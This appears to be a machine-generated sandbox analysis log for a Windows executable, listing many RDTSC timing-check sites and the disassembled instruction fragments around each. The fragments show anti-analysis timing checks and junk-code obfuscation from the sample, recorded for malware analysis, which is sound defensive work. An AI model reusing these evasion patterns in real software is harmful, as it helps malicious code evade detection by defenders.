Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A4A73 second address: 4A4A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A4A81 second address: 4A4A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6EF4 second address: 4A6F6E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA9551579FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+1246AFFBh], ecx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a or edi, dword ptr [ebp+122D37C0h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FA9551579F8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 pushad 0x00000042 mov dword ptr [ebp+122D3061h], edi 0x00000048 mov dword ptr [ebp+122D1BF9h], esi 0x0000004e popad 0x0000004f mov dword ptr [ebp+122D31DDh], esi 0x00000055 mov eax, dword ptr [ebp+122D153Dh] 0x0000005b mov bh, 26h 0x0000005d push FFFFFFFFh 0x0000005f stc 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jno 00007FA9551579FCh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6F6E second address: 4A6F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA2C6 second address: 4AA2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA2CC second address: 4AA336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 jnp 00007FA954E703D1h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FA954E703C8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FA954E703C8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 pushad 0x00000048 jnc 00007FA954E703C6h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA4C6 second address: 4AA4D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA9551579F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA4D7 second address: 4AA4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA4DB second address: 4AA4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE438 second address: 4AE43F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE43F second address: 4AE45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA955157A09h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFA53 second address: 4AFA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFA59 second address: 4AFA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFA5D second address: 4AFA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFA61 second address: 4AFA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and ebx, dword ptr [ebp+122D2EC7h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 mov bx, cx 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov edi, 6AA8064Eh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 jns 00007FA9551579F6h 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFA8B second address: 4AFA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA954E703CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFCCD second address: 4AFCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7BA1 second address: 4B7BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7BA5 second address: 4B7BC6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA9551579F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA955157A05h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7BC6 second address: 4B7BDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA954E703D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44DA7F second address: 44DABA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA955157A04h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA9551579FCh 0x0000000f pushad 0x00000010 jmp 00007FA955157A04h 0x00000015 jmp 00007FA9551579FEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDCF6 second address: 4BDD02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA954E703C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDD02 second address: 4BDD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDF8A second address: 4BDFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA954E703D0h 0x0000000b jmp 00007FA954E703D4h 0x00000010 jmp 00007FA954E703D1h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDFC6 second address: 4BDFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDFCC second address: 4BDFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDFE5 second address: 4BE009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FA9551579F6h 0x00000013 jne 00007FA9551579F6h 0x00000019 jmp 00007FA9551579FAh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE009 second address: 4BE023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA954E703D4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8F3A second address: 4C8F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9551579FBh 0x00000009 js 00007FA9551579F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8F4F second address: 4C8F65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA954E703CEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8F65 second address: 4C8F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C91EE second address: 4C91F8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C91F8 second address: 4C9202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA9551579F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9480 second address: 4C94A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jbe 00007FA954E703C6h 0x00000010 pop eax 0x00000011 pop edi 0x00000012 push ebx 0x00000013 jmp 00007FA954E703CFh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEBB9 second address: 4CEBD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEBD6 second address: 4CEBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEBE0 second address: 4CEBE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE022 second address: 4CE049 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA954E703D4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE30C second address: 4CE321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A01h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE321 second address: 4CE32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE32B second address: 4CE34E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9551579F6h 0x00000008 jmp 00007FA955157A02h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE5EA second address: 4CE5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEA4B second address: 4CEA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4366 second address: 4D4371 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4371 second address: 4D4377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D304D second address: 4D3053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2D7F second address: 4D2D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2D87 second address: 4D2DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA954E703D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4052 second address: 4D4058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4058 second address: 4D4071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA954E703D0h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4071 second address: 4D4076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D74CE second address: 4D74D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D74D4 second address: 4D74D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4561F1 second address: 456239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D0h 0x00000009 jmp 00007FA954E703D1h 0x0000000e popad 0x0000000f jmp 00007FA954E703D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007FA954E703C6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456239 second address: 45623D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE101 second address: 4DE10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE10E second address: 4DE12D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA955157A03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491698 second address: 49169E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49169E second address: 4916A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49178A second address: 491790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491790 second address: 491795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491795 second address: 4917A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA954E703CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4917A7 second address: 4917E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d jmp 00007FA9551579FEh 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 jmp 00007FA955157A00h 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA9551579FFh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4919FE second address: 491A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491AF3 second address: 491AF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C1C second address: 491C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C20 second address: 491C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C26 second address: 491C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C48 second address: 491C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C4C second address: 491C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491C87 second address: 491C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492007 second address: 49200D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49200D second address: 492077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FA9551579FEh 0x00000010 jc 00007FA9551579F8h 0x00000016 pushad 0x00000017 popad 0x00000018 nop 0x00000019 sub dword ptr [ebp+122D188Dh], edx 0x0000001f push 0000001Eh 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007FA9551579F8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b mov edi, 64EC05CEh 0x00000040 jc 00007FA9551579F9h 0x00000046 movsx edx, ax 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c js 00007FA9551579FCh 0x00000052 je 00007FA9551579F6h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492374 second address: 49239A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FA954E703D3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49239A second address: 49239E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49239E second address: 4923BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4924A9 second address: 49251A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FA9551579F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movzx edi, cx 0x00000026 lea eax, dword ptr [ebp+12475F61h] 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FA9551579F8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007FA955157A06h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 pop ecx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49251A second address: 492524 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492524 second address: 492586 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA9551579FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007FA955157A0Fh 0x00000011 jmp 00007FA955157A09h 0x00000016 nop 0x00000017 movsx ecx, bx 0x0000001a mov ecx, dword ptr [ebp+122D323Fh] 0x00000020 lea eax, dword ptr [ebp+12475F1Dh] 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FA9551579F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492586 second address: 49258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE640 second address: 4DE644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE644 second address: 4DE654 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FA954E703C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE654 second address: 4DE658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE7A8 second address: 4DE7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA954E703C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE7B2 second address: 4DE7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE916 second address: 4DE938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FA954E703C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DEA6B second address: 4DEAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA955157A07h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jbe 00007FA9551579F6h 0x00000015 jmp 00007FA955157A04h 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DEAAD second address: 4DEAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703CAh 0x00000009 pop edx 0x0000000a jmp 00007FA954E703CCh 0x0000000f rdtsc
